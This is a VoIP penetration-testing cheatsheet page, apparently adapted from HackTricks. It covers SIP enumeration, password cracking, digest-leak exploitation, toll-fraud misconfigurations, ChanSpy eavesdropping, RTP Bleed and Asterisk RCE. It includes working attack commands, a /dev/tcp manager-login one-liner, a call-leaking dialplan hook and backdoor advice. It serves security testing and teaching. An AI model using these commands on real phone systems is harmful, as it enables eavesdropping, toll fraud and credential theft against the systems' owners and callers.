daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

overview.md (33973B)


      1 ---
      2 title: "Pentesting VoIP"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/pentesting-voip/README.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-voip/README.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: true
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Pentesting VoIP
     14 
     15 ## VoIP Basic Information
     16 
     17 To start learning about how VoIP works check:
     18 
     19 
     20 [Basic Voip Protocols](/hacktricks/network-services-pentesting/pentesting-voip/basic-voip-protocols/overview)
     21 
     22 ## Basic messages<sup>[[7]](#references)</sup>
     23 
     24 ```text
     25 Request name	Description								RFC references
     26 ------------------------------------------------------------------------------------------------------
     27 REGISTER	Register a SIP user.							RFC 3261
     28 INVITE		Initiate a dialog for establishing a call. 				RFC 3261
     29 ACK		Confirm that an entity has received.					RFC 3261
     30 BYE		Signal termination of a dialog and end a call.				RFC 3261
     31 CANCEL		Cancel any pending request.						RFC 3261
     32 UPDATE		Modify the state of a session without changing the state of the dialog.	RFC 3311
     33 REFER		Ask recipient to issue a request for the purpose of call transfer.	RFC 3515
     34 PRACK		Provisional acknowledgement.						RFC 3262
     35 SUBSCRIBE	Initiates a subscription for notification of events from a notifier.	RFC 6665
     36 NOTIFY		Inform a subscriber of notifications of a new event.			RFC 6665
     37 PUBLISH		Publish an event to a notification server.				RFC 3903
     38 MESSAGE		Deliver a text message.	Used in instant messaging applications.		RFC 3428
     39 INFO		Send mid-session information that does not modify the session state.	RFC 6086
     40 OPTIONS		Query the capabilities of an endpoint					RFC 3261
     41 ```
     42 
     43 ## Response codes<sup>[[7]](#references)</sup>
     44 
     45 **1xx—Provisional Responses**
     46 
     47 ```text
     48 100 Trying
     49 180 Ringing
     50 181 Call is Being Forwarded
     51 182 Queued
     52 183 Session Progress
     53 199 Early Dialog Terminated
     54 ```
     55 
     56 **2xx—Successful Responses**
     57 
     58 ```text
     59 200 OK
     60 202 Accepted
     61 204 No Notification
     62 ```
     63 
     64 **3xx—Redirection Responses**
     65 
     66 ```text
     67 300 Multiple Choices
     68 301 Moved Permanently
     69 302 Moved Temporarily
     70 305 Use Proxy
     71 380 Alternative Service
     72 ```
     73 
     74 **4xx—Client Failure Responses**
     75 
     76 ```text
     77 400 Bad Request
     78 401 Unauthorized
     79 402 Payment Required
     80 403 Forbidden
     81 404 Not Found
     82 405 Method Not Allowed
     83 406 Not Acceptable
     84 407 Proxy Authentication Required
     85 408 Request Timeout
     86 409 Conflict
     87 410 Gone
     88 411 Length Required
     89 412 Conditional Request Failed
     90 413 Request Entity Too Large
     91 414 Request-URI Too Long
     92 415 Unsupported Media Type
     93 416 Unsupported URI Scheme
     94 417 Unknown Resource-Priority
     95 420 Bad Extension
     96 421 Extension Required
     97 422 Session Interval Too Small
     98 423 Interval Too Brief
     99 424 Bad Location Information
    100 425 Bad Alert Message
    101 428 Use Identity Header
    102 429 Provide Referrer Identity
    103 430 Flow Failed
    104 433 Anonymity Disallowed
    105 436 Bad Identity-Info
    106 437 Unsupported Certificate
    107 438 Invalid Identity Header
    108 439 First Hop Lacks Outbound Support
    109 440 Max-Breadth Exceeded
    110 469 Bad Info Package
    111 470 Consent Needed
    112 480 Temporarily Unavailable
    113 481 Call/Transaction Does Not Exist
    114 482 Loop Detected
    115 483 Too Many Hops
    116 484 Address Incomplete
    117 485 Ambiguous
    118 486 Busy Here
    119 487 Request Terminated
    120 488 Not Acceptable Here
    121 489 Bad Event
    122 491 Request Pending
    123 493 Undecipherable
    124 494 Security Agreement Required
    125 ```
    126 
    127 **5xx—Server Failure Responses**
    128 
    129 ```text
    130 500 Internal Server Error
    131 501 Not Implemented
    132 502 Bad Gateway
    133 503 Service Unavailable
    134 504 Server Time-out
    135 505 Version Not Supported
    136 513 Message Too Large
    137 555 Push Notification Service Not Supported
    138 580 Precondition Failure
    139 ```
    140 
    141 **6xx—Global Failure Responses**
    142 
    143 ```text
    144 600 Busy Everywhere
    145 603 Decline
    146 604 Does Not Exist Anywhere
    147 606 Not Acceptable
    148 607 Unwanted
    149 608 Rejected
    150 ```
    151 
    152 ## VoIP Enumeration
    153 
    154 ### Telephone Numbers
    155 
    156 One of a red team's first steps can be to identify company telephone numbers with OSINT tools, Google searches, or web scraping.
    157 
    158 Once you have the telephone numbers you could use online services to identify the operator:
    159 
    160 - [https://www.numberingplans.com/?page=analysis\&sub=phonenr](https://www.numberingplans.com/?page=analysis&sub=phonenr)
    161 - [https://mobilenumbertracker.com/](https://mobilenumbertracker.com/)
    162 - [https://www.whitepages.com/](https://www.whitepages.com/)
    163 - [https://www.twilio.com/lookup](https://www.twilio.com/lookup)
    164 
    165 Knowing whether the operator provides VoIP services can help determine whether the company uses VoIP. A company may also connect its own VoIP PBX to the traditional telephony network with PSTN cards instead of buying a managed VoIP service.
    166 
    167 Automated responses or music on hold can also indicate that VoIP is in use.
    168 
    169 ### Google Dorks
    170 
    171 ```bash
    172 # Grandstream phones
    173 intitle:"Grandstream Device Configuration" Password
    174 intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
    175 
    176 # Cisco Callmanager
    177 inurl:"ccmuser/logon.asp"
    178 intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
    179 
    180 # Cisco phones
    181 inurl:"NetworkConfiguration" cisco
    182 
    183 # Linksys phones
    184 intitle:"Sipura SPA Configuration"
    185 
    186 # Snom phones
    187 intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
    188 
    189 # Polycom SoundPoint IP & phones
    190 intitle:"SoundPoint IP Configuration Utility - Registration"
    191 "Welcome to Polycom Web Configuration Utility" "Login as" "Password"
    192 intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
    193 intitle:"Polycom Login" inurl:"/login.html"
    194 intitle:"Polycom Login" -.com
    195 
    196 # Elastix
    197 intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
    198 
    199 # FreePBX
    200 inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
    201 ```
    202 
    203 ### OSINT information
    204 
    205 Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.
    206 
    207 ### Network Enumeration
    208 
    209 - **Nmap** can scan UDP services, but broad UDP scans are slow and may be less accurate than targeted probes.
    210 
    211 ```bash
    212 sudo nmap --script=sip-methods -sU -p 5060 10.10.0.0/24
    213 ```
    214 
    215 - **`svmap`** from SIPVicious (`sudo apt install sipvicious`): Will locate SIP services in the indicated network.<sup>[[2]](#references)</sup>
    216   - `svmap` is **easy to block** because it uses the User-Agent `friendly-scanner`, but you could modify the code from `/usr/share/sipvicious/sipvicious` and change it.
    217 
    218 ```bash
    219 # Use --fp to fingerprint the services
    220 svmap 10.10.0.0/24 -p 5060-5070 [--fp]
    221 ```
    222 
    223 - **`SIPPTS scan`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS scan is a fast scanner for SIP services over UDP, TCP, or TLS. It uses multithreading and can scan large network ranges. You can specify a port range, scan TCP and UDP, select a method (the default is `OPTIONS`), and customize the User-Agent.<sup>[[1]](#references)</sup>
    224 
    225 ```bash
    226 sippts scan -i 10.10.0.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
    227 
    228 [!] IP/Network: 10.10.0.0/24
    229 [!] Port range: 5060-5080
    230 [!] Protocol: UDP, TCP, TLS
    231 [!] Method to scan: REGISTER
    232 [!] Customized User-Agent: Cisco
    233 [!] Used threads: 200
    234 ```
    235 
    236 - **metasploit**:
    237 
    238 ```text
    239 auxiliary/scanner/sip/options_tcp normal  No     SIP Endpoint Scanner (TCP)
    240 auxiliary/scanner/sip/options     normal  No     SIP Endpoint Scanner (UDP)
    241 ```
    242 
    243 #### Extra Network Enumeration
    244 
    245 The PBX could also be exposing other network services such as:
    246 
    247 - **69/UDP (TFTP)**: Firmware updates
    248 - **80 (HTTP) / 443 (HTTPS)**: To manage the device from the web
    249 - **389 (LDAP)**: Alternative to store the users information
    250 - **3306 (MySQL**): MySQL database
    251 - **5038 (Manager)**: Allows to use Asterisk from other platforms
    252 - **5222 (XMPP)**: Messages using Jabber
    253 - **5432 (PostgreSQL)**: PostgreSQL database
    254 - And others...
    255 
    256 ### Methods Enumeration
    257 
    258 It's possible to find **which methods are available** to use in the PBX using `SIPPTS enumerate` from [**sippts**](https://github.com/Pepelux/sippts)<sup>[[1]](#references)</sup>
    259 
    260 ```bash
    261 sippts enumerate -i 10.10.0.10
    262 ```
    263 
    264 ### Analysing server responses
    265 
    266 It is very important to analyse the headers that a server sends back to us, depending on the type of message and headers that we send. With `SIPPTS send` from [**sippts**](https://github.com/Pepelux/sippts) we can send personalised messages, manipulating all the headers, and analyse the response.<sup>[[1]](#references)</sup>
    267 
    268 ```bash
    269 sippts send -i 10.10.0.10 -m INVITE -ua Grandstream -fu 200 -fn Bob -fd 11.0.0.1 -tu 201 -fn Alice -td 11.0.0.2 -header "Allow-Events: presence" -sdp
    270 ```
    271 
    272 It is also possible to obtain data when the server uses WebSockets. `SIPPTS wssend` from [**sippts**](https://github.com/Pepelux/sippts) can send customized WebSocket messages.
    273 
    274 ```bash
    275 sippts wssend -i 10.10.0.10 -r 443 -path /ws
    276 ```
    277 
    278 ### Extension Enumeration
    279 
    280 Extensions in a PBX (Private Branch Exchange) system refer to the **unique internal identifiers assigned to individual** phone lines, devices, or users within an organization or business. Extensions make it possible to **route calls within the organization efficiently**, without the need for individual external phone numbers for each user or device.
    281 
    282 - **`svwar`** from SIPVicious (`sudo apt install sipvicious`): `svwar` is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by **guessing a range of extensions or a given list of extensions**.<sup>[[2]](#references)</sup>
    283 
    284 ```bash
    285 svwar 10.10.0.10 -p5060 -e100-300 -m REGISTER
    286 ```
    287 
    288 - **`SIPPTS exten`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS exten identifies extensions on a SIP server. Sipexten can check large network and port ranges.<sup>[[1]](#references)</sup>
    289 
    290 ```bash
    291 sippts exten -i 10.10.0.10 -r 5060 -e 100-200
    292 ```
    293 
    294 - **metasploit**: You can also enumerate extensions/usernames with metasploit:
    295 
    296 ```text
    297 auxiliary/scanner/sip/enumerator_tcp  normal  No     SIP Username Enumerator (TCP)
    298 auxiliary/scanner/sip/enumerator      normal  No     SIP Username Enumerator (UDP)
    299 ```
    300 
    301 - **`enumiax` (`apt install enumiax`): enumIAX** is an Inter Asterisk Exchange protocol **username brute-force enumerator**. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
    302 
    303 ```bash
    304 enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 10.10.0.10 # Use dictionary
    305 enumiax -v -m3 -M3 10.10.0.10
    306 ```
    307 
    308 ## VoIP Attacks
    309 
    310 ### Password Brute-Force - online
    311 
    312 Having discovered the **PBX** and some **extensions/usernames**, a Red Team could try to **authenticate via the `REGISTER` method** to an extension using a dictionary of common passwords to brute force the authentication.
    313 
    314 > [!CAUTION]
    315 > Note that a **username** can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...
    316 >
    317 > If the username is not the same as the extension, you will need to **figure out the username to brute-force it**.
    318 
    319 - **`svcrack`** from SIPVicious (`sudo apt install sipvicious`): SVCrack allows you to crack the password for a specific username/extension on a PBX.<sup>[[2]](#references)</sup>
    320 
    321 ```bash
    322 svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
    323 svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
    324 ```
    325 
    326 - **`SIPPTS rcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rcrack is a remote password cracker for SIP services. Rcrack can test passwords for several users in different IPs and port ranges.<sup>[[1]](#references)</sup>
    327 
    328 ```bash
    329 sippts rcrack -i 10.10.0.10 -e 100,101,103-105 -w wordlist/rockyou.txt
    330 ```
    331 
    332 - **Metasploit**:
    333   - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack.rb)
    334   - [https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb](https://github.com/jesusprubio/metasploit-sip/blob/master/sipcrack_tcp.rb)
    335 
    336 ### VoIP Sniffing
    337 
    338 If you find VoIP equipment on an **open Wi-Fi network**, you may be able to **sniff its traffic**. On a more restricted network (connected via Ethernet or protected Wi-Fi), you could perform **man-in-the-middle attacks such as** [**ARP spoofing**](../../generic-methodologies-and-resources/pentesting-network/index.html#arp-spoofing) between the **PBX and the gateway** to inspect the traffic.
    339 
    340 Among the network information, you could find **web credentials** to manage the equipment, user **extensions**, **username**, **IP** addresses, even **hashed passwords** and **RTP packets** that you could reproduce to **hear the conversation**, and more.
    341 
    342 To get this information you could use tools such as Wireshark, tcpdump... but a **specially created tool to sniff VoIP conversations is** [**ucsniff**](https://github.com/Seabreg/ucsniff).
    343 
    344 > [!CAUTION]
    345 > Note that if **TLS is used in the SIP communication** you won't be able to see the SIP communication in clear.\
    346 > The same will happen if **SRTP** and **ZRTP** is used, **RTP packets won't be in clear text**.
    347 
    348 #### SIP credentials (Password Brute-Force - offline)
    349 
    350 [Review this **SIP REGISTER example**](/hacktricks/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol#sip-register-example) to understand how credentials are transmitted.
    351 
    352 - **`sipdump`** and **`sipcrack`**, part of **sipcrack** (`apt-get install sipcrack`): These tools can extract SIP digest authentication exchanges from a **PCAP** and brute-force them offline.<sup>[[6]](#references)</sup>
    353 
    354 ```bash
    355 sipdump -p net-capture.pcap sip-creds.txt
    356 sipcrack sip-creds.txt -w dict.txt
    357 ```
    358 
    359 - **`SIPPTS dump`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dump can extract digest authentications from a pcap file.<sup>[[1]](#references)</sup>
    360 
    361 ```bash
    362 sippts dump -f capture.pcap -o data.txt
    363 ```
    364 
    365 - **`SIPPTS dcrack`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS dcrack is a tool to crack the digest authentications obtained with SIPPTS dump.
    366 
    367 ```bash
    368 sippts dcrack -f data.txt -w wordlist/rockyou.txt
    369 ```
    370 
    371 - **`SIPPTS tshark`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS tshark extracts data of SIP protocol from a PCAP file.
    372 
    373 ```bash
    374 sippts tshark -f capture.pcap [-filter auth]
    375 ```
    376 
    377 #### DTMF codes
    378 
    379 Network traffic may reveal not only SIP credentials but also DTMF codes used to access services such as **voicemail**.\
    380 These codes can be sent in SIP `INFO` messages, as audio, or inside RTP packets. If the codes are in RTP packets, extract that part of the conversation and use `multimon` to decode them:
    381 
    382 ```bash
    383 multimon -a DTMF -t wac pin.wav
    384 ```
    385 
    386 ### Free calls / legacy Asterisk connection misconfigurations<sup>[[8]](#references)</sup>
    387 
    388 The `sip.conf`, `type`, and `insecure` examples below apply to the legacy `chan_sip` driver. Asterisk deprecated `chan_sip` in version 17 and removed it in version 21; assess modern deployments through their `pjsip.conf` endpoint, authentication, address-of-record, and identification objects instead.<sup>[[8]](#references)</sup>
    389 
    390 In legacy Asterisk configurations, it is possible to allow a connection **from a specific IP address** or from **any IP address**:
    391 
    392 ```text
    393 host=10.10.10.10
    394 host=dynamic
    395 ```
    396 
    397 If an IP address is specified, the host **does not need to send periodic REGISTER** requests. Dynamic peers instead refresh their registration before the expiry conveyed by the `Expires` header or the Contact `expires` parameter, commonly every 30 minutes. A statically addressed host must still allow the VoIP server to reach its SIP and media ports for incoming calls.
    398 
    399 Legacy `chan_sip` peers can use the following `type` values:
    400 
    401 - **`type=user`**: The user can only receive calls as user.
    402 - **`type=friend`**: It's possible to perform calls as peer and receive them as user (used with extensions)
    403 - **`type=peer`**: It's possible to send and receive calls as peer (SIP-trunks)
    404 
    405 It's also possible to establish trust with the insecure variable:
    406 
    407 - **`insecure=port`**: Allows peer connections validated by IP.
    408 - **`insecure=invite`**: Doesn't require authentication for INVITE messages
    409 - **`insecure=port,invite`**: Both
    410 
    411 > [!WARNING]
    412 > When **`type=friend`** is used, the **value** of the **host** variable **won't be used**, so if an admin **misconfigure a SIP-trunk** using that value, **anyone will be able to connect to it**.
    413 >
    414 > For example, this configuration would be vulnerable:\
    415 > `host=10.10.10.10`\
    416 > `insecure=port,invite`\
    417 > `type=friend`
    418 
    419 ### Free calls / Asterisk context misconfigurations
    420 
    421 In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
    422 
    423 Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
    424 
    425 ```bash
    426 csharpCopy code[my_context]
    427 ```
    428 
    429 Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
    430 
    431 ```text
    432 [my_context]
    433 exten => 100,1,Answer()
    434 exten => 100,n,Playback(welcome)
    435 exten => 100,n,Hangup()
    436 ```
    437 
    438 This example demonstrates a simple context called "my_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
    439 
    440 This is **another context** that allows calls to **any other number**:
    441 
    442 ```text
    443 [external]
    444 exten => _X.,1,Dial(SIP/trunk/${EXTEN})
    445 ```
    446 
    447 If the admin defines the **default context** as:
    448 
    449 ```text
    450 [default]
    451 include => my_context
    452 include => external
    453 ```
    454 
    455 > [!WARNING]
    456 > Anyone will be able to use the **server to call any other number** (and the server administrator will pay for the call).
    457 
    458 > [!CAUTION]
    459 > Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
    460 
    461 - **`SIPPTS invite`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS invite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.<sup>[[1]](#references)</sup>
    462 
    463   For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
    464 
    465 ```bash
    466 # Trying to make a call to the number 555555555 (without auth) with source number 200.
    467 sippts invite -i  10.10.0.10 -fu 200 -tu 555555555 -v
    468 
    469 # Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
    470 sippts invite -i 10.10.0.10 -tu 555555555 -t 444444444
    471 ```
    472 
    473 ### Free calls / Misconfigured IVRS
    474 
    475 IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
    476 
    477 IVRS in VoIP systems typically consists of:
    478 
    479 1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
    480 2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
    481 3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
    482 4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
    483 5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
    484 
    485 In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow.
    486 
    487 #### Example of vulnerable configuration
    488 
    489 ```text
    490 exten => 0,100,Read(numbers,the_call,,,,5)
    491 exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
    492 exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
    493 exten => 0,103,GotoIf("$[${numbers}"=""]?100)
    494 exten => 0,104,Dial(LOCAL/${numbers})
    495 ```
    496 
    497 The preceding example asks the user to **press 1 to call** one department, **2 to call** another, or enter a **complete extension**.\
    498 The vulnerability is that the **extension length is not checked**, so a user can enter a complete telephone number during the five-second timeout and cause Asterisk to call it.
    499 
    500 ### Extension Injection
    501 
    502 Using a extension such as:
    503 
    504 ```text
    505 exten => _X.,1,Dial(SIP/${EXTEN})
    506 ```
    507 
    508 Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen:
    509 
    510 ```text
    511 exten => 101,1,Dial(SIP/101)
    512 ```
    513 
    514 However, if **`${EXTEN}`** accepts **characters other than digits** (as in older Asterisk versions), an attacker could supply **`101&SIP123123123`** to call the telephone number 123123123. This would produce the following result:
    515 
    516 ```text
    517 exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
    518 ```
    519 
    520 Therefore, calls to extensions **`101`** and **`123123123`** will be sent, and only the first answered call will be established. If an attacker supplies a nonexistent extension that bypasses the applied matching, the attacker may be able to inject a call only to the desired number.
    521 
    522 ## SIPDigestLeak vulnerability
    523 
    524 The SIP Digest Leak is a vulnerability that affects a large number of SIP Phones, including both hardware and software IP Phones as well as phone adapters (VoIP to analogue). The vulnerability allows **leakage of the Digest authentication response**, which is computed from the password. An **offline password attack is then possible** and can recover most passwords based on the challenge response.<sup>[[5]](#references)</sup>
    525 
    526 **[Vulnerability scenario from here**](https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf):<sup>[[5]](#references)</sup>
    527 
    528 1. An IP Phone (victim) is listening on any port (for example: 5060), accepting phone calls
    529 2. The attacker sends an INVITE to the IP Phone
    530 3. The victim phone starts ringing and someone picks up and hangs up (because no one answers the phone at the other end)
    531 4. When the phone is hung up, the **victim phone sends a BYE to the attacker**
    532 5. The **attacker issues a 407 response** that **asks for authentication** and issues an authentication challenge
    533 6. The **victim phone provides a response to the authentication challenge** in a second BYE
    534 7. The **attacker can then issue a brute-force attack** on the challenge response on his local machine (or distributed network etc) and guess the password
    535 
    536 - **SIPPTS leak** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS leak exploits the SIP Digest Leak vulnerability that affects many SIP phones. Its output can be saved in SipCrack format and brute-forced with SIPPTS dcrack or SipCrack.<sup>[[1]](#references)</sup>
    537 
    538 ```bash
    539 sippts leak -i 10.10.0.10
    540 
    541 [!] Target: 10.10.0.10:5060/UDP
    542 [!] Caller: 100
    543 [!] Callee: 100
    544 
    545 [=>] Request INVITE
    546 [<=] Response 100 Trying
    547 [<=] Response 180 Ringing
    548 [<=] Response 200 OK
    549 [=>] Request ACK
    550 	... waiting for BYE ...
    551 [<=] Received BYE
    552 [=>] Request 407 Proxy Authentication Required
    553 [<=] Received BYE with digest
    554 [=>] Request 200 Ok
    555 
    556 Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@10.10.0.10:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5
    557 ```
    558 
    559 ### Click2Call
    560 
    561 Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
    562 
    563 A common Asterisk profile for this is:
    564 
    565 ```text
    566 [web_user]
    567 secret = complex_password
    568 deny = 0.0.0.0/0.0.0.0
    569 allow = 0.0.0.0/0.0.0.0
    570 displayconnects = yes
    571 read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
    572 write = system,call,agent,user,config,command,reporting,originate
    573 ```
    574 
    575 - The previous profile is allowing **ANY IP address to connect** (if the password is known).
    576 - To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed.
    577 
    578 With those permissions any IP knowing the password could connect and extract too much info, like:
    579 
    580 ```bash
    581 # Get all the peers
    582 exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
    583 ```
    584 
    585 **More information or actions could be requested.**
    586 
    587 ### **Eavesdropping**
    588 
    589 In Asterisk, **`ChanSpy`** can monitor selected extensions (or all of them) and listen to active conversations. This command must be assigned to an extension.
    590 
    591 For example, **`exten => 333,1,ChanSpy('all',qb)`** indicate that if you **call** the **extension 333**, it will **monitor** **`all`** the extensions, **start listening** whenever a new conversation start (**`b`**) in quiet mode (**`q`**) as we don't want to interact on it. You could go from one conversation happening to another pressing **`*`**, or marking the extension number.
    592 
    593 It is also possible to use **`ExtenSpy`** to monitor only one extension.
    594 
    595 Instead of listening the conversations, it's possible to **record them in files** using an extension such as:
    596 
    597 ```text
    598 [recorded-context]
    599 exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
    600 exten => _X.,2,MixMonitor(${NAME})
    601 ```
    602 
    603 Calls will be saved in **`/tmp`**.
    604 
    605 You could also even make Asterisk **execute a script that will leak the call** when it's closed.
    606 
    607 ```text
    608 exten => h,1,System(/tmp/leak_conv.sh &)
    609 ```
    610 
    611 ### RTP/RTCP Bleed vulnerabilities
    612 
    613 **RTCPBleed** is a major security issue affecting Asterisk-based VoIP servers (published in 2017). The vulnerability allows **RTP (Real Time Protocol) traffic**, which carries VoIP conversations, to be **intercepted and redirected by anyone on the Internet**. This occurs because RTP traffic bypasses authentication when navigating through NAT (Network Address Translation) firewalls.<sup>[[4]](#references)</sup>
    614 
    615 RTP proxies address **NAT limitations** in real-time communication systems by proxying RTP streams between parties. With NAT, a proxy often cannot rely on the RTP address and port advertised through signaling such as SIP. Some proxies therefore learn the **IP-and-port tuple automatically** by inspecting incoming RTP traffic and using its source as the response destination. If this "learning mode" does not authenticate the source, an **attacker can send RTP traffic to the proxy** and receive media intended for a legitimate caller or callee. This is called RTP Bleed.<sup>[[4]](#references)</sup>
    616 
    617 Another interesting behaviour of RTP proxies and RTP stacks is that sometimes, **even if not vulnerable to RTP Bleed**, they will **accept, forward and/or process RTP packets from any source**. Therefore attackers can send RTP packets which may allow them to inject their media instead of the legitimate one. We call this attack RTP injection because it allows injection of illegitimate RTP packets into existent RTP streams. This vulnerability may be found in both RTP proxies and endpoints.<sup>[[4]](#references)</sup>
    618 
    619 Asterisk and FreePBX have traditionally used the **`NAT=yes` setting**, which enables RTP traffic to bypass authentication, potentially leading to no audio or one-way audio on calls.
    620 
    621 For more info check [https://www.rtpbleed.com/](https://www.rtpbleed.com/)<sup>[[4]](#references)</sup>
    622 
    623 - **`SIPPTS rtpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleed detects the RTP Bleed vulnerability sending RTP streams.<sup>[[1]](#references)</sup>
    624 
    625 ```bash
    626 sippts rtpbleed -i 10.10.0.10
    627 ```
    628 
    629 - **`SIPPTS rtcpbleed`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtcpbleed detects the RTP Bleed vulnerability sending RTCP streams.
    630 
    631 ```bash
    632 sippts rtcpbleed -i 10.10.0.10
    633 ```
    634 
    635 - **`SIPPTS rtpbleedflood`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedflood exploit the RTP Bleed vulnerability sending RTP streams.
    636 
    637 ```bash
    638 sippts rtpbleedflood -i 10.10.0.10 -p 10070 -v
    639 ```
    640 
    641 - **`SIPPTS rtpbleedinject`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPPTS rtpbleedinject exploit the RTP Bleed vulnerability injecting an audio file (WAV format).
    642 
    643 ```bash
    644 sippts rtpbleedinject -i 10.10.0.10 -p 10070 -f audio.wav
    645 ```
    646 
    647 ### RCE
    648 
    649 If you can **add extension rules and reload them** in Asterisk (for example, after compromising a vulnerable web-management server), the **`System`** command can provide remote code execution.
    650 
    651 ```text
    652 same => n,System(echo "Called at $(date)" >> /tmp/call_log.txt)
    653 ```
    654 
    655 There is command called **`Shell`** that could be used **instead of `System`** to execute system commands if necessary.
    656 
    657 > [!WARNING]
    658 > If the server is **disallowing the use of certain characters** in the **`System`** command (like in Elastix), check if the web server allows to **create files somehow inside the system** (like in Elastix or trixbox), and use it to **create a backdoor script** and then use **`System`** to **execute** that **script**.
    659 
    660 #### Interesting local files and permissions
    661 
    662 - **`sip.conf`** -> Contains the password of SIP users.
    663 - If the **Asterisk server is running as root**, you could compromise root
    664 - The **MySQL `root` user** might **have no password**.
    665   - this could be used to create a new mysql user as backdoor
    666 - **FreePBX**
    667   - **`amportal.conf`** -> Contains the password of the web panel administrator (FreePBX)
    668   - **`FreePBX.conf`** -> Contains the password of the `FreePBXuser` account used to access the database
    669     - this could be used to create a new mysql user as backdoor
    670 - **`Elastix`**
    671   - **`Elastix.conf`** -> Contains several cleartext passwords, such as the MySQL `root`, IMAP daemon, and web administrator passwords
    672 - **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed.
    673 
    674 ### RTP Injection
    675 
    676 It is possible to insert a **`.wav`** file into conversations with tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
    677 
